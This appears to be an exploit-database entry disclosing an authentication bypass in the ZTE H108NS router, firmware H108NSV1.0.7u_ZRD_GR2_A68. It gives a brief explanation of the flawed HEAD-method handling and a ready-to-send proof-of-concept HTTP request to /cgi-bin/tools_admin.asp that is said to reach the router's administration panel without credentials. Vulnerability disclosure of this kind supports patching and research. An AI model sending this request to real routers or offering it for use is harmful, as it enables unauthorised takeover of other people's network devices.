Router ZTE-H108NS - Authentication Bypass

vendor:

H108NS

by:

George Tsimpidas

N/A

CVSS

N/A

Authentication Bypass

CWE

Product Name: H108NS

Affected Version From: H108NSV1.0.7u_ZRD_GR2_A68

Affected Version To: H108NSV1.0.7u_ZRD_GR2_A68

Patch Exists:

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Debian 5.18.5

2022

Router ZTE-H108NS – Authentication Bypass

When specific http methods are listed within a security constraint, then only those methods are protected. Router ZTE-H108NS defines the following http methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed operation which allows the HEAD to be implemented correctly with every Response Status Code. Below request bypasses successfully the Basic Authentication, and grants access to the Administration Panel of the Router.

Mitigation:

Source

Exploit-DB raw data:

# Exploit Title: Router ZTE-H108NS - Authentication Bypass
# Date: 19-11-2022
# Exploit Author: George Tsimpidas 
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# CVE: N/A 
# Tested on: Debian 5.18.5

Description :

When specific http methods are listed within a security constraint,
then only those
methods are protected. Router ZTE-H108NS defines the following http
methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed
operation which allows the HEAD to be implemented correctly with every
Response Status Code.


Proof Of Concept :

Below request bypasses successfully the Basic Authentication, and
grants access to the Administration Panel of the Router.


HEAD /cgi-bin/tools_admin.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: SESSIONID=1cd6bb77
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0